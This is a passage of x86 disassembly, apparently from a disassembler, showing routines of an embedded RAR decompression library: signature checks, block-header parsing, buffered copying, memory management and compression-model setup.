jz short loc_9B0BFF
push 1 ; Size
lea eax, [esp+0Bh]
push eax ; Dst
push edi ; int
call sub_9B3D6A
add esp, 0Ch
cmp eax, 1
jmp short loc_9B0BFD
sub_9B0BB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B0C53 proc near ; CODE XREF: sub_9B0F21+B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push 1
push 0
push edi
call sub_9B3E22
add esp, 0Ch
mov [ebp+var_4], eax
push 74h
pop eax
call sub_9B0BB7
mov esi, eax
test esi, esi
jz short loc_9B0CE3
mov ebx, free
loc_9B0C81: ; CODE XREF: sub_9B0C53+8E�j
movzx eax, word ptr [esi+5]
mov ecx, [ebp+var_4]
add eax, ecx
test byte ptr [esi+4], 80h
mov [esi+2Ch], ecx
mov [esi+30h], eax
jz short loc_9B0C9E
mov edx, [esi+7]
add edx, eax
mov [esi+30h], edx
loc_9B0C9E: ; CODE XREF: sub_9B0C53+41�j
mov eax, [esi+30h]
cmp eax, ecx
jle short loc_9B0CEA
movzx ecx, byte ptr [esi+2]
cmp ecx, [ebp+arg_4]
jz short loc_9B0CEF
mov edi, [ebp+arg_0]
push 0
push eax
push edi
call sub_9B3E22
add esp, 0Ch
cmp eax, [esi+30h]
jnz short loc_9B0CE3
push esi ; Memory
call ebx ; free
push 1
push 0
push edi
call sub_9B3E22
add esp, 10h
mov [ebp+var_4], eax
push 74h
pop eax
call sub_9B0BB7
mov esi, eax
test esi, esi
jnz short loc_9B0C81
loc_9B0CE3: ; CODE XREF: sub_9B0C53+26�j
; sub_9B0C53+6D�j ...
xor eax, eax
loc_9B0CE5: ; CODE XREF: sub_9B0C53+DE�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B0CEA: ; CODE XREF: sub_9B0C53+50�j
; sub_9B0C53+AE�j
push esi ; Memory
call ebx ; free
jmp short loc_9B0D25
; ---------------------------------------------------------------------------
loc_9B0CEF: ; CODE XREF: sub_9B0C53+59�j
movzx eax, word ptr [esi+1Ah]
inc eax
push eax ; Size
call malloc
test eax, eax
pop ecx
mov [esi+28h], eax
jz short loc_9B0CEA
movzx ecx, word ptr [esi+1Ah]
movzx edi, word ptr [esi+1Ah]
push ecx ; Size
push eax ; Dst
push [ebp+arg_0] ; int
call sub_9B3D6A
add esp, 0Ch
cmp eax, edi
jz short loc_9B0D28
push dword ptr [esi+28h] ; Memory
call ebx ; free
push esi ; Memory
call ebx ; free
pop ecx
loc_9B0D25: ; CODE XREF: sub_9B0C53+9A�j
pop ecx
jmp short loc_9B0CE3
; ---------------------------------------------------------------------------
loc_9B0D28: ; CODE XREF: sub_9B0C53+C7�j
mov eax, [esi+28h]
mov byte ptr [edi+eax], 0
mov eax, esi
jmp short loc_9B0CE5
sub_9B0C53 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B0D33 proc near ; CODE XREF: sub_9B0DF4+18�p
Buf1 = byte ptr -10h
Buf2 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push 7 ; Size
lea eax, [ebp+Buf1]
push eax ; Dst
push [ebp+arg_0] ; int
mov [ebp+Buf2], 52h
mov [ebp+var_7], 61h
mov [ebp+var_6], 72h
mov [ebp+var_5], 21h
mov [ebp+var_4], 1Ah
mov [ebp+var_3], 7
mov [ebp+var_2], 0
call sub_9B3D6A
add esp, 0Ch
cmp eax, 7
jz short loc_9B0D6F
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_9B0D6F: ; CODE XREF: sub_9B0D33+36�j
push 7 ; Size
lea eax, [ebp+Buf2]
push eax ; Buf2
lea eax, [ebp+Buf1]
push eax ; Buf1
call memcmp
add esp, 0Ch
neg eax
sbb eax, eax
inc eax
leave
retn
sub_9B0D33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B0D88 proc near ; CODE XREF: sub_9B0FE1+CB�p
Dst = byte ptr -2000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 2000h
call __alloca_probe
push ebx
mov ebx, [ebp+arg_8]
test ebx, ebx
push esi
push edi
jbe short loc_9B0DDE
loc_9B0D9F: ; CODE XREF: sub_9B0D88+54�j
mov edi, 2000h
cmp ebx, edi
ja short loc_9B0DAA
mov edi, ebx
loc_9B0DAA: ; CODE XREF: sub_9B0D88+1E�j
push edi ; Size
lea eax, [ebp+Dst]
push eax ; Dst
push [ebp+arg_0] ; int
call sub_9B3D6A
mov esi, eax
add esp, 0Ch
cmp esi, edi
jnz short loc_9B0DE6
push esi ; Size
lea eax, [ebp+Dst]
push eax ; Src
push [ebp+arg_4] ; int
call sub_9B3DC6
add esp, 0Ch
cmp eax, esi
jnz short loc_9B0DEB
sub ebx, esi
jnz short loc_9B0D9F
loc_9B0DDE: ; CODE XREF: sub_9B0D88+15�j
mov eax, [ebp+arg_8]
loc_9B0DE1: ; CODE XREF: sub_9B0D88+6A�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B0DE6: ; CODE XREF: sub_9B0D88+39�j
mov eax, [ebp+arg_8]
jmp short loc_9B0DF0
; ---------------------------------------------------------------------------
loc_9B0DEB: ; CODE XREF: sub_9B0D88+50�j
mov eax, [ebp+arg_8]
sub eax, esi
loc_9B0DF0: ; CODE XREF: sub_9B0D88+61�j
sub eax, ebx
jmp short loc_9B0DE1
sub_9B0D88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B0DF4(int, void *Memory)
sub_9B0DF4 proc near ; CODE XREF: sub_9AF0BC+53�p
arg_0 = dword ptr 8
Memory = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+Memory]
test ebx, ebx
jnz short loc_9B0E07
push 0FFFFFFFEh
pop eax
jmp loc_9B0F1E
; ---------------------------------------------------------------------------
loc_9B0E07: ; CODE XREF: sub_9B0DF4+9�j
push edi
mov edi, [ebp+arg_0]
push edi
call sub_9B0D33
test eax, eax
pop ecx
jnz short loc_9B0E1E
loc_9B0E16: ; CODE XREF: sub_9B0DF4+37�j
push 0FFFFFFFEh
pop eax
jmp loc_9B0F1D
; ---------------------------------------------------------------------------
loc_9B0E1E: ; CODE XREF: sub_9B0DF4+20�j
push 73h
pop eax
call sub_9B0BB7
test eax, eax
mov [ebp+Memory], eax
jz short loc_9B0E16
test byte ptr [eax+3], 80h
push esi
jz short loc_9B0E39
push 2
loc_9B0E36: ; CODE XREF: sub_9B0DF4+4E�j
pop esi
jmp short loc_9B0E5E
; ---------------------------------------------------------------------------
loc_9B0E39: ; CODE XREF: sub_9B0DF4+3E�j
cmp word ptr [eax+5], 0Dh
jnb short loc_9B0E44
push 0FFFFFFFEh
jmp short loc_9B0E36
; ---------------------------------------------------------------------------
loc_9B0E44: ; CODE XREF: sub_9B0DF4+4A�j
push 411BD8h ; Size
call malloc
mov esi, eax
xor edi, edi
cmp esi, edi
pop ecx
jnz short loc_9B0E6D
mov eax, [ebp+Memory]
or esi, 0FFFFFFFFh
loc_9B0E5E: ; CODE XREF: sub_9B0DF4+43�j
push eax ; Memory
call free
pop ecx
mov eax, esi
jmp loc_9B0F1C
; ---------------------------------------------------------------------------
loc_9B0E6D: ; CODE XREF: sub_9B0DF4+62�j
or dword ptr [esi+40D7F4h], 0FFFFFFFFh
lea eax, [esi+408B10h]
push eax
mov [esi+40D7CCh], edi
mov [esi+40D7B0h], edi
mov [esi+40D7A0h], edi
mov [esi+40D7A8h], edi
mov [esi+40D7A4h], edi
mov [esi+40D7ACh], edi
call sub_9B2484
mov eax, [ebp+Memory]
mov ax, [eax+5]
cmp ax, 0Dh
pop ecx
jbe short loc_9B0EFE
movzx eax, ax
push 1
sub eax, 0Dh
push eax
push [ebp+arg_0]
call sub_9B3E22
add esp, 0Ch
test eax, eax
jnz short loc_9B0EFE
push [ebp+Memory] ; Memory
mov edi, free
call edi ; free
lea eax, [esi+408B10h]
push eax
call sub_9B2497
push esi
call sub_9AFB83
lea eax, [esi+40D7CCh]
push eax
call sub_9B2804
push esi ; Memory
call edi ; free
add esp, 14h
push 0FFFFFFFEh
pop eax
jmp short loc_9B0F1C
; ---------------------------------------------------------------------------
loc_9B0EFE: ; CODE XREF: sub_9B0DF4+BC�j
; sub_9B0DF4+D4�j
mov eax, [ebp+Memory]
mov [ebx+10h], eax
mov eax, [ebp+arg_0]
mov [ebx+1Ch], eax
mov [ebx+0Ch], esi
mov [ebx+4], edi
mov [ebx+8], edi
mov dword ptr [ebx+18h], 1
xor eax, eax
loc_9B0F1C: ; CODE XREF: sub_9B0DF4+74�j
; sub_9B0DF4+108�j
pop esi
loc_9B0F1D: ; CODE XREF: sub_9B0DF4+25�j
pop edi
loc_9B0F1E: ; CODE XREF: sub_9B0DF4+E�j
pop ebx
pop ebp
retn
sub_9B0DF4 endp
; =============== S U B R O U T I N E =======================================
sub_9B0F21 proc near ; CODE XREF: sub_9AF0BC+6C�p
arg_0 = dword ptr 4
push ebp
push edi
mov edi, [esp+8+arg_0]
push 74h
push dword ptr [edi+1Ch]
call sub_9B0C53
xor ebp, ebp
cmp eax, ebp
pop ecx
pop ecx
mov [edi], eax
jnz short loc_9B0F43
xor eax, eax
inc eax
jmp loc_9B0FDE
; ---------------------------------------------------------------------------
loc_9B0F43: ; CODE XREF: sub_9B0F21+18�j
push esi
push 21h ; Size
call malloc
mov esi, eax
cmp esi, ebp
pop ecx
jnz short loc_9B0F5B
loc_9B0F53: ; CODE XREF: sub_9B0F21+A0�j
or eax, 0FFFFFFFFh
jmp loc_9B0FDD
; ---------------------------------------------------------------------------
loc_9B0F5B: ; CODE XREF: sub_9B0F21+30�j
push ebx
mov ebx, [edi]
push 1
push ebp
push ebp
push dword ptr [ebx+20h]
call __allmul
mov ecx, [ebx+7]
xor ebx, ebx
add eax, ecx
push 1
adc edx, ebx
push ebp
mov [esi], eax
mov [esi+4], edx
mov ebx, [edi]
push ebp
push dword ptr [ebx+24h]
call __allmul
mov ecx, [ebx+0Bh]
xor ebx, ebx
add eax, ecx
mov [esi+8], eax
adc edx, ebx
mov [esi+0Ch], edx
mov eax, [edi]
mov eax, [eax+10h]
mov [esi+18h], eax
mov eax, [edi]
mov al, [eax+19h]
mov [esi+20h], al
mov eax, [edi]
push dword ptr [eax+28h] ; Src
call _strdup
cmp eax, ebp
pop ecx
mov [esi+10h], eax
pop ebx
jnz short loc_9B0FC3
push esi ; Memory
call free
pop ecx
jmp short loc_9B0F53
; ---------------------------------------------------------------------------
loc_9B0FC3: ; CODE XREF: sub_9B0F21+96�j
mov [esi+14h], ebp
mov [esi+1Ch], ebp
mov eax, [edi+8]
cmp eax, ebp
jnz short loc_9B0FD5
mov [edi+4], esi
jmp short loc_9B0FD8
; ---------------------------------------------------------------------------
loc_9B0FD5: ; CODE XREF: sub_9B0F21+AD�j
mov [eax+14h], esi
loc_9B0FD8: ; CODE XREF: sub_9B0F21+B2�j
mov [edi+8], esi
xor eax, eax
loc_9B0FDD: ; CODE XREF: sub_9B0F21+35�j
pop esi
loc_9B0FDE: ; CODE XREF: sub_9B0F21+1D�j
pop edi
pop ebp
retn
sub_9B0F21 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B0FE1 proc near ; CODE XREF: sub_9AF0BC+81�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
mov eax, [esi]
push edi
mov edi, eax
mov [ebp+arg_0], eax
movzx eax, word ptr [edi+5]
add eax, [edi+2Ch]
push 0
push eax
push dword ptr [esi+1Ch]
call sub_9B3E22
movzx ecx, word ptr [edi+5]
add ecx, [edi+2Ch]
add esp, 0Ch
cmp eax, ecx
jz short loc_9B101B
push dword ptr [edi+28h]
loc_9B1013: ; CODE XREF: sub_9B0FE1+15C�j
mov edi, free
jmp short loc_9B1053
; ---------------------------------------------------------------------------
loc_9B101B: ; CODE XREF: sub_9B0FE1+2D�j
mov ax, [edi+3]
test al, 4
jz short loc_9B1063
mov eax, [esi+8]
mov dword ptr [eax+1Ch], 1
loc_9B102D: ; CODE XREF: sub_9B0FE1+84�j
; sub_9B0FE1+93�j ...
mov edi, [esi]
push 0
mov eax, edi
push dword ptr [eax+30h]
push dword ptr [esi+1Ch]
call sub_9B3E22
add esp, 0Ch
push dword ptr [edi+28h] ; Memory
cmp eax, [edi+30h]
mov edi, free
jz loc_9B1142
loc_9B1053: ; CODE XREF: sub_9B0FE1+38�j
call edi ; free
push dword ptr [esi] ; Memory
call edi ; free
pop ecx
pop ecx
push 0FFFFFFFEh
pop eax
jmp loc_9B1162
; ---------------------------------------------------------------------------
loc_9B1063: ; CODE XREF: sub_9B0FE1+40�j
test al, 3
jnz short loc_9B102D
mov eax, [esi+10h]
mov ax, [eax+3]
test al, 1
jz short loc_9B1076
test al, 8
jnz short loc_9B102D
loc_9B1076: ; CODE XREF: sub_9B0FE1+8F�j
push dword ptr [edi+0Bh] ; Size
lea eax, [esi+24h]
push 8302h ; char
push eax ; int
call sub_9B3EA2
add esp, 0Ch
test eax, eax
jge short loc_9B1095
mov eax, [esi]
jmp loc_9B113A
; ---------------------------------------------------------------------------
loc_9B1095: ; CODE XREF: sub_9B0FE1+AB�j
mov ecx, [esi+0Ch]
mov [ecx], eax
mov edx, [esi]
mov [esi+20h], eax
cmp byte ptr [edx+19h], 30h
jnz short loc_9B10B9
push dword ptr [edx+7]
push eax
push dword ptr [esi+1Ch]
call sub_9B0D88
add esp, 0Ch
jmp loc_9B102D
; ---------------------------------------------------------------------------
loc_9B10B9: ; CODE XREF: sub_9B0FE1+C2�j
mov eax, [edx+0Bh]
and dword ptr [ecx+40D7C8h], 0
mov [ecx+40D7C4h], eax
mov eax, [esi]
mov eax, [eax+7]
mov [ecx+40D7F8h], eax
mov eax, [esi]
cmp byte ptr [eax+18h], 0Fh
ja short loc_9B10F8
cmp dword ptr [esi+18h], 1
jbe short loc_9B10F0
mov eax, [esi+10h]
test byte ptr [eax+3], 8
jz short loc_9B10F0
xor eax, eax
inc eax
jmp short loc_9B10F2
; ---------------------------------------------------------------------------
loc_9B10F0: ; CODE XREF: sub_9B0FE1+FF�j
; sub_9B0FE1+108�j
xor eax, eax
loc_9B10F2: ; CODE XREF: sub_9B0FE1+10D�j
push ecx
push eax
push 0Fh
jmp short loc_9B111B
; ---------------------------------------------------------------------------
loc_9B10F8: ; CODE XREF: sub_9B0FE1+F9�j
cmp dword ptr [esi+18h], 1
jnz short loc_9B110A
test byte ptr [eax+3], 10h
jz short loc_9B110A
add word ptr [eax+3], 0FFF0h
loc_9B110A: ; CODE XREF: sub_9B0FE1+11B�j
; sub_9B0FE1+121�j
mov eax, [esi]
push ecx
xor ecx, ecx
mov cl, [eax+3]
movzx eax, byte ptr [eax+18h]
and ecx, 10h
push ecx
push eax
loc_9B111B: ; CODE XREF: sub_9B0FE1+115�j
push dword ptr [esi+1Ch]
call sub_9B0B9A
add esp, 10h
test eax, eax
jnz loc_9B102D
mov eax, [esi]
test byte ptr [eax+3], 10h
jz loc_9B102D
loc_9B113A: ; CODE XREF: sub_9B0FE1+AF�j
push dword ptr [eax+28h] ; Memory
jmp loc_9B1013
; ---------------------------------------------------------------------------
loc_9B1142: ; CODE XREF: sub_9B0FE1+6C�j
call edi ; free
push dword ptr [esi] ; Memory
call edi ; free
mov eax, [esi+0Ch]
test eax, eax
pop ecx
pop ecx
jz short loc_9B115D
add eax, 40D7CCh
push eax
call sub_9B2804
pop ecx
loc_9B115D: ; CODE XREF: sub_9B0FE1+16E�j
inc dword ptr [esi+18h]
xor eax, eax
loc_9B1162: ; CODE XREF: sub_9B0FE1+7D�j
pop edi
pop esi
pop ebp
retn
sub_9B0FE1 endp
; =============== S U B R O U T I N E =======================================
sub_9B1166 proc near ; CODE XREF: sub_9AF0BC+C2�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+20h]
test eax, eax
push edi
mov edi, [esi+0Ch]
jz short loc_9B117D
push eax
call sub_9B3D23
pop ecx
loc_9B117D: ; CODE XREF: sub_9B1166+E�j
add edi, 408B10h
push edi
call sub_9B2497
push dword ptr [esi+10h] ; Memory
mov edi, free
call edi ; free
push dword ptr [esi+0Ch]
call sub_9AFB83
mov eax, [esi+0Ch]
add esp, 0Ch
test eax, eax
jz short loc_9B11B2
add eax, 40D7CCh
push eax
call sub_9B2804
pop ecx
loc_9B11B2: ; CODE XREF: sub_9B1166+3E�j
push dword ptr [esi+0Ch] ; Memory
call edi ; free
pop ecx
pop edi
pop esi
retn
sub_9B1166 endp
; =============== S U B R O U T I N E =======================================
sub_9B11BB proc near ; CODE XREF: sub_9B125E+25�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword ptr [eax], 0
and dword ptr [eax+4], 0
retn
sub_9B11BB endp
; =============== S U B R O U T I N E =======================================
sub_9B11C7 proc near ; CODE XREF: sub_9B12A0+2A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_9B11E5
mov eax, [esi]
test eax, eax
jz short loc_9B11DE
push eax ; Memory
call free
pop ecx
loc_9B11DE: ; CODE XREF: sub_9B11C7+D�j
and dword ptr [esi], 0
and dword ptr [esi+4], 0
loc_9B11E5: ; CODE XREF: sub_9B11C7+7�j
pop esi
retn
sub_9B11C7 endp
; =============== S U B R O U T I N E =======================================
sub_9B11E7 proc near ; CODE XREF: sub_9B3A12+76�p
; sub_9B3A12+15E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
add [esi+4], eax
mov eax, [esi+4]
lea eax, [eax+eax*4]
shl eax, 3
push eax ; NewSize
push dword ptr [esi] ; Memory
call sub_9B132C
test eax, eax
pop ecx
pop ecx
mov [esi], eax
jnz short loc_9B120E
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B120E: ; CODE XREF: sub_9B11E7+23�j
mov esi, [esi+4]
push 28h ; Size
lea ecx, [esi+esi*4]
lea eax, [eax+ecx*8-28h]
push 0 ; Val
push eax ; Dst
call memset
add esp, 0Ch
xor eax, eax
inc eax
pop esi
retn
sub_9B11E7 endp
; =============== S U B R O U T I N E =======================================
sub_9B122A proc near ; CODE XREF: sub_9AFBCB+86�p
; sub_9AFBCB+168�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
add [esi+4], eax
mov eax, [esi+4]
shl eax, 2
push eax ; NewSize
push dword ptr [esi] ; Memory
call sub_9B132C
test eax, eax
pop ecx
pop ecx
mov [esi], eax
jnz short loc_9B1251
and [esi+4], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B1251: ; CODE XREF: sub_9B122A+20�j
mov ecx, [esi+4]
and dword ptr [eax+ecx*4-4], 0
xor eax, eax
inc eax
pop esi
retn
sub_9B122A endp
; =============== S U B R O U T I N E =======================================
sub_9B125E proc near ; CODE XREF: sub_9AFBCB+95�p
; sub_9AFBCB:loc_9AFCD4�p
push esi
push edi
push 54h ; Size
call sub_9B1311
mov esi, eax
xor edi, edi
cmp esi, edi
pop ecx
jnz short loc_9B1274
xor eax, eax
jmp short loc_9B129D
; ---------------------------------------------------------------------------
loc_9B1274: ; CODE XREF: sub_9B125E+10�j
lea eax, [esi+10h]
push eax
mov [esi], edi
mov [esi+4], edi
mov [esi+8], edi
mov [esi+0Ch], edi
call sub_9B11BB
pop ecx
mov [esi+1Ch], edi
mov [esi+20h], edi
mov [esi+2Ch], edi
mov [esi+28h], edi
mov [esi+24h], edi
mov [esi+50h], edi
mov eax, esi
loc_9B129D: ; CODE XREF: sub_9B125E+14�j
pop edi
pop esi
retn
sub_9B125E endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B12A0(void *Memory)
sub_9B12A0 proc near ; CODE XREF: sub_9AF4A5+12A�p
; sub_9AF4A5+1B3�p ...
Memory = dword ptr 4
push esi
mov esi, [esp+4+Memory]
test esi, esi
jz short loc_9B12D5
mov eax, [esi+1Ch]
test eax, eax
push edi
mov edi, free
jz short loc_9B12BB
push eax ; Memory
call edi ; free
pop ecx
loc_9B12BB: ; CODE XREF: sub_9B12A0+15�j
mov eax, [esi+20h]
test eax, eax
jz short loc_9B12C6
push eax ; Memory
call edi ; free
pop ecx
loc_9B12C6: ; CODE XREF: sub_9B12A0+20�j
lea eax, [esi+10h]
push eax
call sub_9B11C7
push esi ; Memory
call edi ; free
pop ecx
pop ecx
pop edi
loc_9B12D5: ; CODE XREF: sub_9B12A0+7�j
pop esi
retn
sub_9B12A0 endp
; =============== S U B R O U T I N E =======================================
sub_9B12D7 proc near ; CODE XREF: sub_9AFB83+32�p
; sub_9AFB83+3E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_9B130F
push edi
xor edi, edi
cmp [esi+4], edi
jbe short loc_9B12F9
loc_9B12E8: ; CODE XREF: sub_9B12D7+20�j
mov eax, [esi]
push dword ptr [eax+edi*4] ; Memory
call sub_9B12A0
inc edi
cmp edi, [esi+4]
pop ecx
jb short loc_9B12E8
loc_9B12F9: ; CODE XREF: sub_9B12D7+F�j
mov eax, [esi]
test eax, eax
pop edi
jz short loc_9B1308
push eax ; Memory
call free
pop ecx
loc_9B1308: ; CODE XREF: sub_9B12D7+27�j
and dword ptr [esi], 0
and dword ptr [esi+4], 0
loc_9B130F: ; CODE XREF: sub_9B12D7+7�j
pop esi
retn
sub_9B12D7 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B1311(size_t Size)
sub_9B1311 proc near ; CODE XREF: sub_9AFBCB+2BA�p
; sub_9AFBCB+34F�p ...
Size = dword ptr 4
mov eax, [esp+Size]
test eax, eax
jz short loc_9B1329
cmp eax, 0B000000h
ja short loc_9B1329
push eax ; Size
call malloc
pop ecx
retn
; ---------------------------------------------------------------------------
loc_9B1329: ; CODE XREF: sub_9B1311+6�j
; sub_9B1311+D�j
xor eax, eax
retn
sub_9B1311 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B132C(void *Memory, size_t NewSize)
sub_9B132C proc near ; CODE XREF: sub_9AFBCB+D6�p
; sub_9AFBCB+431�p ...
Memory = dword ptr 8
NewSize = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+NewSize], 0
jz short loc_9B135F
cmp [ebp+NewSize], 0B000000h
ja short loc_9B135F
push [ebp+NewSize] ; NewSize
push [ebp+Memory] ; Memory
call realloc
test eax, eax
pop ecx
pop ecx
jnz short loc_9B1361
cmp [ebp+Memory], eax
jz short loc_9B135F
push [ebp+Memory] ; Memory
call free
pop ecx
loc_9B135F: ; CODE XREF: sub_9B132C+7�j
; sub_9B132C+10�j ...
xor eax, eax
loc_9B1361: ; CODE XREF: sub_9B132C+22�j
pop ebp
retn
sub_9B132C endp
; =============== S U B R O U T I N E =======================================
sub_9B1363 proc near ; CODE XREF: sub_9B1675+4D�p
; sub_9B1A07+1B8�p
arg_0 = dword ptr 4
movsx ecx, word ptr [eax+ecx*2+0B8h]
movsx edx, word ptr [eax+edx*2+0B8h]
sub edx, ecx
push esi
mov esi, [esp+4+arg_0]
lea ecx, [ecx+ecx*2]
lea ecx, [esi+ecx*4]
movsx esi, word ptr [eax+edx*2+102h]
push edi
movsx edi, word ptr [eax+esi*2+0B8h]
cmp edi, edx
jz short loc_9B13B0
mov edi, [eax+esi*4+1Ch]
dec esi
mov [ecx], edi
mov [eax+esi*4+20h], ecx
movsx esi, word ptr [eax+esi*2+0B8h]
lea edi, [esi+esi*2]
lea ecx, [ecx+edi*4]
sub edx, esi
loc_9B13B0: ; CODE XREF: sub_9B1363+30�j
movsx edx, word ptr [eax+edx*2+102h]
lea eax, [eax+edx*4+20h]
mov edx, [eax]
pop edi
mov [ecx], edx
mov [eax], ecx
pop esi
retn
sub_9B1363 endp
; =============== S U B R O U T I N E =======================================
sub_9B13C5 proc near ; CODE XREF: sub_9B13DA+12�p
; sub_9B2497+9�j ...
cmp dword ptr [eax+1Ch], 0
jz short locret_9B13D9
push dword ptr [eax+10h] ; Memory
and dword ptr [eax+1Ch], 0
call free
pop ecx
locret_9B13D9: ; CODE XREF: sub_9B13C5+4�j
retn
sub_9B13C5 endp
; =============== S U B R O U T I N E =======================================
sub_9B13DA proc near ; CODE XREF: sub_9B24A5+16�p
; sub_9B24CC+CC�p
push ebx
mov ebx, eax
shl ebx, 14h
cmp [edi+1Ch], ebx
jnz short loc_9B13EA
xor eax, eax
inc eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_9B13EA: ; CODE XREF: sub_9B13DA+9�j
mov eax, edi
call sub_9B13C5
cmp ebx, 83FFFF4h
jbe short loc_9B13FD
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_9B13FD: ; CODE XREF: sub_9B13DA+1D�j
push esi
push 0Ch
xor edx, edx
pop ecx
mov eax, ebx
div ecx
inc eax
lea esi, [eax+eax*2]
shl esi, 2
push esi ; Size
call malloc
test eax, eax
pop ecx
mov [edi+10h], eax
jz short loc_9B142A
lea eax, [eax+esi-0Ch]
mov [edi+8], eax
xor eax, eax
mov [edi+1Ch], ebx
inc eax
loc_9B142A: ; CODE XREF: sub_9B13DA+41�j
pop esi
pop ebx
retn
sub_9B13DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B142D proc near ; CODE XREF: sub_9B17CA+25�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push edi
push 98h ; Size
lea eax, [esi+20h]
push 0 ; Val
push eax ; Dst
call memset
mov edi, [esi+1Ch]
add esp, 0Ch
push 8
pop ebx
mov eax, edi
cdq
idiv ebx
push 0Ch
pop ebx
xor edx, edx
push 0Ch
mov ecx, [esi+10h]
mov [esi], ecx
div ebx
xor edx, edx
mov ebx, eax
imul ebx, 54h
sub edi, ebx
mov eax, edi
mov [ebp+var_4], eax
pop edi
div edi
push 0Ch
lea eax, [eax+eax*2]
lea eax, [edx+eax*4]
lea edi, [eax+ecx]
mov eax, [ebp+var_4]
add ecx, eax
mov [esi+0Ch], ecx
pop ecx
xor edx, edx
mov eax, ebx
div ecx
push 4
mov [esi+4], edi
mov [esi+14h], edi
lea ecx, [esi+0B8h]
lea eax, [eax+eax*2]
lea eax, [edi+eax*4]
pop edi
mov [esi+18h], eax
xor eax, eax
push 2
inc eax
mov edx, edi
pop ebx
loc_9B14AA: ; CODE XREF: sub_9B142D+84�j
mov [ecx], ax
add ecx, ebx
inc eax
dec edx
jnz short loc_9B14AA
inc eax
lea ecx, [esi+0C0h]
mov edx, edi
loc_9B14BC: ; CODE XREF: sub_9B142D+97�j
mov [ecx], ax
add ecx, ebx
add eax, ebx
dec edx
jnz short loc_9B14BC
inc eax
lea ecx, [esi+0C8h]
mov edx, edi
loc_9B14CF: ; CODE XREF: sub_9B142D+AB�j
mov [ecx], ax
add ecx, ebx
add eax, 3
dec edx
jnz short loc_9B14CF
push 1Ah
inc eax
lea ecx, [esi+0D0h]
pop edx
loc_9B14E4: ; CODE XREF: sub_9B142D+BF�j
mov [ecx], ax
add ecx, ebx
add eax, edi
dec edx
jnz short loc_9B14E4
xor edx, edx
xor eax, eax
mov [esi+204h], dx
lea ecx, [esi+104h]
loc_9B14FF: ; CODE XREF: sub_9B142D+F3�j
lea edi, [edx+1]
movsx edx, word ptr [esi+eax*2+0B8h]
xor ebx, ebx
cmp edx, edi
setl bl
mov edx, edi
add eax, ebx
mov [ecx], ax
inc ecx
inc ecx
cmp edx, 80h
jl short loc_9B14FF
pop edi
pop ebx
leave
retn
sub_9B142D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1526 proc near ; CODE XREF: sub_9B1675+15�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ecx+14h]
cmp eax, [ecx+18h]
jz short loc_9B1537
mov byte ptr [eax], 0
loc_9B1537: ; CODE XREF: sub_9B1526+C�j
push ebx
push esi
push edi
lea eax, [ebp+var_C]
push 26h
mov [ebp+var_8], eax
mov [ebp+var_C], eax
lea edx, [ecx+20h]
lea esi, [ecx+0B8h]
pop edi
jmp short loc_9B1578
; ---------------------------------------------------------------------------
loc_9B1551: ; CODE XREF: sub_9B1526+55�j
mov eax, [edx]
mov ebx, [eax]
mov [edx], ebx
lea ebx, [ebp+var_C]
mov [eax+4], ebx
mov ebx, [ebp+var_C]
mov [eax], ebx
mov ebx, [ebp+var_C]
mov [ebx+4], eax
mov [ebp+var_C], eax
or word ptr [eax+8], 0FFFFh
mov bx, [esi]
mov [eax+0Ah], bx
loc_9B1578: ; CODE XREF: sub_9B1526+29�j
; sub_9B1526+5D�j
cmp dword ptr [edx], 0
jnz short loc_9B1551
inc esi
inc esi
add edx, 4
dec edi
jnz short loc_9B1578
mov eax, [ebp+var_C]
lea esi, [ebp+var_C]
cmp eax, esi
mov edx, eax
jz loc_9B1665
jmp short loc_9B15C0
; ---------------------------------------------------------------------------
loc_9B1597: ; CODE XREF: sub_9B1526+AA�j
movzx esi, word ptr [eax+0Ah]
movzx edi, word ptr [edx+0Ah]
add esi, edi
cmp esi, 10000h
jge short loc_9B15D2
